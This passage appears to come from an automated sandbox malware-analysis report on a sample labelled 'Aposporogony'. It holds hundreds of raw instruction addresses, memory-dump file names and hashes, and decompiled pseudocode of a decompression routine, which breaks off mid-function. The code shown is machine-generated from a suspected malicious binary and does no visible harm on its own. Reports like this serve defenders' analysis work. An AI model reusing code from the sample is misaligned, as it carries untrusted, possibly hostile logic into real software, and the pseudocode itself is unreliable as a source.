                                                                                                                                                                                      0x00406bf8
                                                                                                                                                                                      0x00406bf8
                                                                                                                                                                                      0x00406bfc
                                                                                                                                                                                      0x00406c04
                                                                                                                                                                                      0x00406c09
                                                                                                                                                                                      0x00406c0b
                                                                                                                                                                                      0x00406c0d
                                                                                                                                                                                      0x00406c0d
                                                                                                                                                                                      0x00406c2f
                                                                                                                                                                                      0x00406c36
                                                                                                                                                                                      0x00406c39
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406c3f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406c3f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406c44
                                                                                                                                                                                      0x00406c44
                                                                                                                                                                                      0x00406c48
                                                                                                                                                                                      0x00407308
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407308
                                                                                                                                                                                      0x00406c4e
                                                                                                                                                                                      0x00406c51
                                                                                                                                                                                      0x00406c54
                                                                                                                                                                                      0x00406c58
                                                                                                                                                                                      0x00406c5b
                                                                                                                                                                                      0x00406c61
                                                                                                                                                                                      0x00406c63
                                                                                                                                                                                      0x00406c63
                                                                                                                                                                                      0x00406c63
                                                                                                                                                                                      0x00406c66
                                                                                                                                                                                      0x00406c69
                                                                                                                                                                                      0x00406c69
                                                                                                                                                                                      0x00406c69
                                                                                                                                                                                      0x00406c6f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406c71
                                                                                                                                                                                      0x00406c74
                                                                                                                                                                                      0x00406c77
                                                                                                                                                                                      0x00406c7a
                                                                                                                                                                                      0x00406c7d
                                                                                                                                                                                      0x00406c80
                                                                                                                                                                                      0x00406c83
                                                                                                                                                                                      0x00406c86
                                                                                                                                                                                      0x00406c89
                                                                                                                                                                                      0x00406c8c
                                                                                                                                                                                      0x00406c8f
                                                                                                                                                                                      0x00406ca7
                                                                                                                                                                                      0x00406caa
                                                                                                                                                                                      0x00406cad
                                                                                                                                                                                      0x00406cb0
                                                                                                                                                                                      0x00406cb0
                                                                                                                                                                                      0x00406cb3
                                                                                                                                                                                      0x00406cb7
                                                                                                                                                                                      0x00406cb9
                                                                                                                                                                                      0x00406c91
                                                                                                                                                                                      0x00406c91
                                                                                                                                                                                      0x00406c99
                                                                                                                                                                                      0x00406c9e
                                                                                                                                                                                      0x00406ca0
                                                                                                                                                                                      0x00406ca2
                                                                                                                                                                                      0x00406ca2
                                                                                                                                                                                      0x00406cbc
                                                                                                                                                                                      0x00406cc3
                                                                                                                                                                                      0x00406cc6
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406cc8
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406cc8
                                                                                                                                                                                      0x00406cc6
                                                                                                                                                                                      0x00406ccd
                                                                                                                                                                                      0x00406ccd
                                                                                                                                                                                      0x00406ccd
                                                                                                                                                                                      0x00406ccd
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406d08
                                                                                                                                                                                      0x00406d08
                                                                                                                                                                                      0x00406d0c
                                                                                                                                                                                      0x00407314
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407314
                                                                                                                                                                                      0x00406d12
                                                                                                                                                                                      0x00406d15
                                                                                                                                                                                      0x00406d18
                                                                                                                                                                                      0x00406d1c
                                                                                                                                                                                      0x00406d1f
                                                                                                                                                                                      0x00406d25
                                                                                                                                                                                      0x00406d27
                                                                                                                                                                                      0x00406d27
                                                                                                                                                                                      0x00406d27
                                                                                                                                                                                      0x00406d2a
                                                                                                                                                                                      0x00406d2d
                                                                                                                                                                                      0x00406d2d
                                                                                                                                                                                      0x00406d33
                                                                                                                                                                                      0x00406cd1
                                                                                                                                                                                      0x00406cd1
                                                                                                                                                                                      0x00406cd4
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406cd4
                                                                                                                                                                                      0x00406d35
                                                                                                                                                                                      0x00406d35
                                                                                                                                                                                      0x00406d38
                                                                                                                                                                                      0x00406d3b
                                                                                                                                                                                      0x00406d3e
                                                                                                                                                                                      0x00406d41
                                                                                                                                                                                      0x00406d44
                                                                                                                                                                                      0x00406d47
                                                                                                                                                                                      0x00406d4a
                                                                                                                                                                                      0x00406d4d
                                                                                                                                                                                      0x00406d50
                                                                                                                                                                                      0x00406d53
                                                                                                                                                                                      0x00406d6b
                                                                                                                                                                                      0x00406d6e
                                                                                                                                                                                      0x00406d71
                                                                                                                                                                                      0x00406d74
                                                                                                                                                                                      0x00406d74
                                                                                                                                                                                      0x00406d77
                                                                                                                                                                                      0x00406d7b
                                                                                                                                                                                      0x00406d7d
                                                                                                                                                                                      0x00406d55
                                                                                                                                                                                      0x00406d55
                                                                                                                                                                                      0x00406d5d
                                                                                                                                                                                      0x00406d62
                                                                                                                                                                                      0x00406d64
                                                                                                                                                                                      0x00406d66
                                                                                                                                                                                      0x00406d66
                                                                                                                                                                                      0x00406d80
                                                                                                                                                                                      0x00406d87
                                                                                                                                                                                      0x00406d8a
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406d8c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406d8c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407019
                                                                                                                                                                                      0x00407019
                                                                                                                                                                                      0x0040701d
                                                                                                                                                                                      0x00407344
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407344
                                                                                                                                                                                      0x00407023
                                                                                                                                                                                      0x00407026
                                                                                                                                                                                      0x00407029
                                                                                                                                                                                      0x0040702d
                                                                                                                                                                                      0x00407030
                                                                                                                                                                                      0x00407036
                                                                                                                                                                                      0x00407038
                                                                                                                                                                                      0x00407038
                                                                                                                                                                                      0x00407038
                                                                                                                                                                                      0x0040703b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407128
                                                                                                                                                                                      0x0040712c
                                                                                                                                                                                      0x0040714e
                                                                                                                                                                                      0x00407151
                                                                                                                                                                                      0x0040715b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040715b
                                                                                                                                                                                      0x0040712e
                                                                                                                                                                                      0x00407131
                                                                                                                                                                                      0x00407135
                                                                                                                                                                                      0x00407138
                                                                                                                                                                                      0x00407138
                                                                                                                                                                                      0x0040713b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004071e5
                                                                                                                                                                                      0x004071e9
                                                                                                                                                                                      0x00407207
                                                                                                                                                                                      0x00407207
                                                                                                                                                                                      0x00407207
                                                                                                                                                                                      0x0040720e
                                                                                                                                                                                      0x00407215
                                                                                                                                                                                      0x0040721c
                                                                                                                                                                                      0x0040721c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040721c
                                                                                                                                                                                      0x004071eb
                                                                                                                                                                                      0x004071ee
                                                                                                                                                                                      0x004071f1
                                                                                                                                                                                      0x004071f4
                                                                                                                                                                                      0x004071fb
                                                                                                                                                                                      0x0040713f
                                                                                                                                                                                      0x0040713f
                                                                                                                                                                                      0x00407142
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004072d6
                                                                                                                                                                                      0x004072d9
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406f10
                                                                                                                                                                                      0x00406f12
                                                                                                                                                                                      0x00406f19
                                                                                                                                                                                      0x00406f1a
                                                                                                                                                                                      0x00406f1c
                                                                                                                                                                                      0x00406f1f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406f27
                                                                                                                                                                                      0x00406f2a
                                                                                                                                                                                      0x00406f2d
                                                                                                                                                                                      0x00406f2f
                                                                                                                                                                                      0x00406f31
                                                                                                                                                                                      0x00406f31
                                                                                                                                                                                      0x00406f32
                                                                                                                                                                                      0x00406f35
                                                                                                                                                                                      0x00406f3c
                                                                                                                                                                                      0x00406f3f
                                                                                                                                                                                      0x00406f4d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407223
                                                                                                                                                                                      0x00407223
                                                                                                                                                                                      0x00407226
                                                                                                                                                                                      0x0040722d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407232
                                                                                                                                                                                      0x00407232
                                                                                                                                                                                      0x00407236
                                                                                                                                                                                      0x0040736e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040736e
                                                                                                                                                                                      0x0040723c
                                                                                                                                                                                      0x0040723f
                                                                                                                                                                                      0x00407242
                                                                                                                                                                                      0x00407246
                                                                                                                                                                                      0x00407249
                                                                                                                                                                                      0x0040724f
                                                                                                                                                                                      0x00407251
                                                                                                                                                                                      0x00407251
                                                                                                                                                                                      0x00407251
                                                                                                                                                                                      0x00407254
                                                                                                                                                                                      0x00407257
                                                                                                                                                                                      0x00407257
                                                                                                                                                                                      0x00407257
                                                                                                                                                                                      0x00407257
                                                                                                                                                                                      0x0040725a
                                                                                                                                                                                      0x0040725a
                                                                                                                                                                                      0x0040725e
                                                                                                                                                                                      0x004072be
                                                                                                                                                                                      0x004072c1
                                                                                                                                                                                      0x004072c6
                                                                                                                                                                                      0x004072c7
                                                                                                                                                                                      0x004072c9
                                                                                                                                                                                      0x004072cb
                                                                                                                                                                                      0x004072ce
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004072ce
                                                                                                                                                                                      0x00407260
                                                                                                                                                                                      0x00407266
                                                                                                                                                                                      0x00407269
                                                                                                                                                                                      0x0040726c
                                                                                                                                                                                      0x0040726f
                                                                                                                                                                                      0x00407272
                                                                                                                                                                                      0x00407275
                                                                                                                                                                                      0x00407278
                                                                                                                                                                                      0x0040727b
                                                                                                                                                                                      0x0040727e
                                                                                                                                                                                      0x00407281
                                                                                                                                                                                      0x0040729a
                                                                                                                                                                                      0x0040729d
                                                                                                                                                                                      0x004072a0
                                                                                                                                                                                      0x004072a3
                                                                                                                                                                                      0x004072a7
                                                                                                                                                                                      0x004072a9
                                                                                                                                                                                      0x004072a9
                                                                                                                                                                                      0x004072aa
                                                                                                                                                                                      0x004072ad
                                                                                                                                                                                      0x00407283
                                                                                                                                                                                      0x00407283
                                                                                                                                                                                      0x0040728b
                                                                                                                                                                                      0x00407290
                                                                                                                                                                                      0x00407292
                                                                                                                                                                                      0x00407295
                                                                                                                                                                                      0x00407295
                                                                                                                                                                                      0x004072b0
                                                                                                                                                                                      0x004072b7
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004072b9
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004072b9
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406f55
                                                                                                                                                                                      0x00406f58
                                                                                                                                                                                      0x00406f8e
                                                                                                                                                                                      0x004070be
                                                                                                                                                                                      0x004070be
                                                                                                                                                                                      0x004070be
                                                                                                                                                                                      0x004070be
                                                                                                                                                                                      0x004070c1
                                                                                                                                                                                      0x004070c1
                                                                                                                                                                                      0x004070c4
                                                                                                                                                                                      0x004070c6
                                                                                                                                                                                      0x00407350
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407350
                                                                                                                                                                                      0x004070cc
                                                                                                                                                                                      0x004070cf
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004070d5
                                                                                                                                                                                      0x004070d9
                                                                                                                                                                                      0x004070dc
                                                                                                                                                                                      0x004070dc
                                                                                                                                                                                      0x004070dc
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004070dc
                                                                                                                                                                                      0x00406f5a
                                                                                                                                                                                      0x00406f5c
                                                                                                                                                                                      0x00406f5e
                                                                                                                                                                                      0x00406f60
                                                                                                                                                                                      0x00406f63
                                                                                                                                                                                      0x00406f64
                                                                                                                                                                                      0x00406f66
                                                                                                                                                                                      0x00406f68
                                                                                                                                                                                      0x00406f6b
                                                                                                                                                                                      0x00406f6e
                                                                                                                                                                                      0x00406f84
                                                                                                                                                                                      0x00406f89
                                                                                                                                                                                      0x00406fc1
                                                                                                                                                                                      0x00406fc1
                                                                                                                                                                                      0x00406fc5
                                                                                                                                                                                      0x00406ff1
                                                                                                                                                                                      0x00406ff3
                                                                                                                                                                                      0x00406ffa
                                                                                                                                                                                      0x00406ffd
                                                                                                                                                                                      0x00407000
                                                                                                                                                                                      0x00407000
                                                                                                                                                                                      0x00407005
                                                                                                                                                                                      0x00407005
                                                                                                                                                                                      0x00407007
                                                                                                                                                                                      0x0040700a
                                                                                                                                                                                      0x00407011
                                                                                                                                                                                      0x00407014
                                                                                                                                                                                      0x00407041
                                                                                                                                                                                      0x00407041
                                                                                                                                                                                      0x00407044
                                                                                                                                                                                      0x00407047
                                                                                                                                                                                      0x004070bb
                                                                                                                                                                                      0x004070bb
                                                                                                                                                                                      0x004070bb
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004070bb
                                                                                                                                                                                      0x00407049
                                                                                                                                                                                      0x0040704f
                                                                                                                                                                                      0x00407052
                                                                                                                                                                                      0x00407055
                                                                                                                                                                                      0x00407058
                                                                                                                                                                                      0x0040705b
                                                                                                                                                                                      0x0040705e
                                                                                                                                                                                      0x00407061
                                                                                                                                                                                      0x00407064
                                                                                                                                                                                      0x00407067
                                                                                                                                                                                      0x0040706a
                                                                                                                                                                                      0x00407083
                                                                                                                                                                                      0x00407085
                                                                                                                                                                                      0x00407088
                                                                                                                                                                                      0x00407089
                                                                                                                                                                                      0x0040708c
                                                                                                                                                                                      0x0040708e
                                                                                                                                                                                      0x00407091
                                                                                                                                                                                      0x00407093
                                                                                                                                                                                      0x00407095
                                                                                                                                                                                      0x00407098
                                                                                                                                                                                      0x0040709a
                                                                                                                                                                                      0x0040709d
                                                                                                                                                                                      0x004070a1
                                                                                                                                                                                      0x004070a3
                                                                                                                                                                                      0x004070a3
                                                                                                                                                                                      0x004070a4
                                                                                                                                                                                      0x004070a7
                                                                                                                                                                                      0x004070aa
                                                                                                                                                                                      0x0040706c
                                                                                                                                                                                      0x0040706c
                                                                                                                                                                                      0x00407074
                                                                                                                                                                                      0x00407079
                                                                                                                                                                                      0x0040707b
                                                                                                                                                                                      0x0040707e
                                                                                                                                                                                      0x0040707e
                                                                                                                                                                                      0x004070ad
                                                                                                                                                                                      0x004070b4
                                                                                                                                                                                      0x0040703e
                                                                                                                                                                                      0x0040703e
                                                                                                                                                                                      0x0040703e
                                                                                                                                                                                      0x0040703e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004070b6
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004070b6
                                                                                                                                                                                      0x004070b4
                                                                                                                                                                                      0x00406fc7
                                                                                                                                                                                      0x00406fca
                                                                                                                                                                                      0x00406fcc
                                                                                                                                                                                      0x00406fcf
                                                                                                                                                                                      0x00406fd2
                                                                                                                                                                                      0x00406fd5
                                                                                                                                                                                      0x00406fd7
                                                                                                                                                                                      0x00406fda
                                                                                                                                                                                      0x00406fdd
                                                                                                                                                                                      0x00406fdd
                                                                                                                                                                                      0x00406fe0
                                                                                                                                                                                      0x00406fe0
                                                                                                                                                                                      0x00406fe3
                                                                                                                                                                                      0x00406fea
                                                                                                                                                                                      0x00406fbe
                                                                                                                                                                                      0x00406fbe
                                                                                                                                                                                      0x00406fbe
                                                                                                                                                                                      0x00406fbe
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406fec
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406fec
                                                                                                                                                                                      0x00406fea
                                                                                                                                                                                      0x00406f70
                                                                                                                                                                                      0x00406f73
                                                                                                                                                                                      0x00406f75
                                                                                                                                                                                      0x00406f78
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406cd7
                                                                                                                                                                                      0x00406cd7
                                                                                                                                                                                      0x00406cdb
                                                                                                                                                                                      0x00407320
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407320
                                                                                                                                                                                      0x00406ce1
                                                                                                                                                                                      0x00406ce4
                                                                                                                                                                                      0x00406ce7
                                                                                                                                                                                      0x00406cea
                                                                                                                                                                                      0x00406ced
                                                                                                                                                                                      0x00406cf0
                                                                                                                                                                                      0x00406cf3
                                                                                                                                                                                      0x00406cf5
                                                                                                                                                                                      0x00406cf8
                                                                                                                                                                                      0x00406cfb
                                                                                                                                                                                      0x00406cfe
                                                                                                                                                                                      0x00406d00
                                                                                                                                                                                      0x00406d00
                                                                                                                                                                                      0x00406d00
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004070df
                                                                                                                                                                                      0x004070df
                                                                                                                                                                                      0x004070df
                                                                                                                                                                                      0x004070e3
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004070e9
                                                                                                                                                                                      0x004070ec
                                                                                                                                                                                      0x004070ef
                                                                                                                                                                                      0x004070f2
                                                                                                                                                                                      0x004070f4
                                                                                                                                                                                      0x004070f4
                                                                                                                                                                                      0x004070f4
                                                                                                                                                                                      0x004070f7
                                                                                                                                                                                      0x004070fa
                                                                                                                                                                                      0x004070fd
                                                                                                                                                                                      0x00407100
                                                                                                                                                                                      0x00407103
                                                                                                                                                                                      0x00407106
                                                                                                                                                                                      0x00407107
                                                                                                                                                                                      0x00407109
                                                                                                                                                                                      0x00407109
                                                                                                                                                                                      0x00407109
                                                                                                                                                                                      0x0040710c
                                                                                                                                                                                      0x0040710f
                                                                                                                                                                                      0x00407112
                                                                                                                                                                                      0x00407115
                                                                                                                                                                                      0x00407118
                                                                                                                                                                                      0x0040711c
                                                                                                                                                                                      0x0040711e
                                                                                                                                                                                      0x00407121
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407123
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407123
                                                                                                                                                                                      0x00407121
                                                                                                                                                                                      0x00407356
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406985

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                                                                                                      • Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
                                                                                                                                                                                      • Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                                                                                                      • Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 98%
                                                                                                                                                                                      			E00406943(void* __ecx) {
                                                                                                                                                                                      				void* _v8;
                                                                                                                                                                                      				void* _v12;
                                                                                                                                                                                      				signed int _v16;
                                                                                                                                                                                      				unsigned int _v20;
                                                                                                                                                                                      				signed int _v24;
                                                                                                                                                                                      				signed int _v28;
                                                                                                                                                                                      				signed int _v32;
                                                                                                                                                                                      				signed int _v36;
                                                                                                                                                                                      				signed int _v40;
                                                                                                                                                                                      				signed int _v44;
                                                                                                                                                                                      				signed int _v48;
                                                                                                                                                                                      				signed int _v52;
                                                                                                                                                                                      				signed int _v56;
                                                                                                                                                                                      				signed int _v60;
                                                                                                                                                                                      				signed int _v64;
                                                                                                                                                                                      				signed int _v68;
                                                                                                                                                                                      				signed int _v72;
                                                                                                                                                                                      				signed int _v76;
                                                                                                                                                                                      				signed int _v80;
                                                                                                                                                                                      				signed int _v84;
                                                                                                                                                                                      				signed int _v88;
                                                                                                                                                                                      				signed int _v92;
                                                                                                                                                                                      				signed int _v95;
                                                                                                                                                                                      				signed int _v96;
                                                                                                                                                                                      				signed int _v100;
                                                                                                                                                                                      				signed int _v104;
                                                                                                                                                                                      				signed int _v108;
                                                                                                                                                                                      				signed int _v112;
                                                                                                                                                                                      				signed int _v116;
                                                                                                                                                                                      				signed int _v120;
                                                                                                                                                                                      				intOrPtr _v124;
                                                                                                                                                                                      				signed int _v128;
                                                                                                                                                                                      				signed int _v132;
                                                                                                                                                                                      				signed int _v136;
                                                                                                                                                                                      				void _v140;
                                                                                                                                                                                      				void* _v148;
                                                                                                                                                                                      				signed int _t537;
                                                                                                                                                                                      				signed int _t538;
                                                                                                                                                                                      				signed int _t572;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t572 = 0x22;
                                                                                                                                                                                      				_v148 = __ecx;
                                                                                                                                                                                      				memcpy( &_v140, __ecx, _t572 << 2);
                                                                                                                                                                                      				if(_v52 == 0xffffffff) {
                                                                                                                                                                                      					return 1;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                      					L3:
                                                                                                                                                                                      					_t537 = _v140;
                                                                                                                                                                                      					if(_t537 > 0x1c) {
                                                                                                                                                                                      						break;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					switch( *((intOrPtr*)(_t537 * 4 +  &M00407395))) {
                                                                                                                                                                                      						case 0:
                                                                                                                                                                                      							__eflags = _v112;
                                                                                                                                                                                      							if(_v112 == 0) {
                                                                                                                                                                                      								goto L173;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_v112 = _v112 - 1;
                                                                                                                                                                                      							_v116 = _v116 + 1;
                                                                                                                                                                                      							_t537 =  *_v116;
                                                                                                                                                                                      							__eflags = _t537 - 0xe1;
                                                                                                                                                                                      							if(_t537 > 0xe1) {
                                                                                                                                                                                      								goto L174;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t542 = _t537 & 0x000000ff;
                                                                                                                                                                                      							_push(0x2d);
                                                                                                                                                                                      							asm("cdq");
                                                                                                                                                                                      							_pop(_t576);
                                                                                                                                                                                      							_push(9);
                                                                                                                                                                                      							_pop(_t577);
                                                                                                                                                                                      							_t622 = _t542 / _t576;
                                                                                                                                                                                      							_t544 = _t542 % _t576 & 0x000000ff;
                                                                                                                                                                                      							asm("cdq");
                                                                                                                                                                                      							_t617 = _t544 % _t577 & 0x000000ff;
                                                                                                                                                                                      							_v64 = _t617;
                                                                                                                                                                                      							_v32 = (1 << _t622) - 1;
                                                                                                                                                                                      							_v28 = (1 << _t544 / _t577) - 1;
                                                                                                                                                                                      							_t625 = (0x300 << _t617 + _t622) + 0x736;
                                                                                                                                                                                      							__eflags = 0x600 - _v124;
                                                                                                                                                                                      							if(0x600 == _v124) {
                                                                                                                                                                                      								L12:
                                                                                                                                                                                      								__eflags = _t625;
                                                                                                                                                                                      								if(_t625 == 0) {
                                                                                                                                                                                      									L14:
                                                                                                                                                                                      									_v76 = _v76 & 0x00000000;
                                                                                                                                                                                      									_v68 = _v68 & 0x00000000;
                                                                                                                                                                                      									goto L17;
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									goto L13;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								do {
                                                                                                                                                                                      									L13:
                                                                                                                                                                                      									_t625 = _t625 - 1;
                                                                                                                                                                                      									__eflags = _t625;
                                                                                                                                                                                      									 *((short*)(_v8 + _t625 * 2)) = 0x400;
                                                                                                                                                                                      								} while (_t625 != 0);
                                                                                                                                                                                      								goto L14;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags = _v8;
                                                                                                                                                                                      							if(_v8 != 0) {
                                                                                                                                                                                      								GlobalFree(_v8);
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t537 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                                                                                      							__eflags = _t537;
                                                                                                                                                                                      							_v8 = _t537;
                                                                                                                                                                                      							if(_t537 == 0) {
                                                                                                                                                                                      								goto L174;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								_v124 = 0x600;
                                                                                                                                                                                      								goto L12;
                                                                                                                                                                                      							}
                                                                                                                                                                                      						case 1:
                                                                                                                                                                                      							L15:
                                                                                                                                                                                      							__eflags = _v112;
                                                                                                                                                                                      							if(_v112 == 0) {
                                                                                                                                                                                      								_v140 = 1;
                                                                                                                                                                                      								goto L173;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_v112 = _v112 - 1;
                                                                                                                                                                                      							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
                                                                                                                                                                                      							_v116 = _v116 + 1;
                                                                                                                                                                                      							_t50 =  &_v76;
                                                                                                                                                                                      							 *_t50 = _v76 + 1;
                                                                                                                                                                                      							__eflags =  *_t50;
                                                                                                                                                                                      							L17:
                                                                                                                                                                                      							__eflags = _v76 - 4;
                                                                                                                                                                                      							if(_v76 < 4) {
                                                                                                                                                                                      								goto L15;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t550 = _v68;
                                                                                                                                                                                      							__eflags = _t550 - _v120;
                                                                                                                                                                                      							if(_t550 == _v120) {
                                                                                                                                                                                      								L22:
                                                                                                                                                                                      								_v76 = 5;
                                                                                                                                                                                      								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
                                                                                                                                                                                      								goto L25;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags = _v12;
                                                                                                                                                                                      							_v120 = _t550;
                                                                                                                                                                                      							if(_v12 != 0) {
                                                                                                                                                                                      								GlobalFree(_v12);
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t537 = GlobalAlloc(0x40, _v68); // executed
                                                                                                                                                                                      							__eflags = _t537;
                                                                                                                                                                                      							_v12 = _t537;
                                                                                                                                                                                      							if(_t537 == 0) {
                                                                                                                                                                                      								goto L174;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								goto L22;
                                                                                                                                                                                      							}
                                                                                                                                                                                      						case 2:
                                                                                                                                                                                      							L26:
                                                                                                                                                                                      							_t557 = _v100 & _v32;
                                                                                                                                                                                      							_v136 = 6;
                                                                                                                                                                                      							_v80 = _t557;
                                                                                                                                                                                      							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
                                                                                                                                                                                      							goto L135;
                                                                                                                                                                                      						case 3:
                                                                                                                                                                                      							L23:
                                                                                                                                                                                      							__eflags = _v112;
                                                                                                                                                                                      							if(_v112 == 0) {
                                                                                                                                                                                      								_v140 = 3;
                                                                                                                                                                                      								goto L173;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_v112 = _v112 - 1;
                                                                                                                                                                                      							_t72 =  &_v116;
                                                                                                                                                                                      							 *_t72 = _v116 + 1;
                                                                                                                                                                                      							__eflags =  *_t72;
                                                                                                                                                                                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                                                      							L25:
                                                                                                                                                                                      							_v76 = _v76 - 1;
                                                                                                                                                                                      							__eflags = _v76;
                                                                                                                                                                                      							if(_v76 != 0) {
                                                                                                                                                                                      								goto L23;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							goto L26;
                                                                                                                                                                                      						case 4:
                                                                                                                                                                                      							L136:
                                                                                                                                                                                      							_t559 =  *_t626;
                                                                                                                                                                                      							_t610 = _t559 & 0x0000ffff;
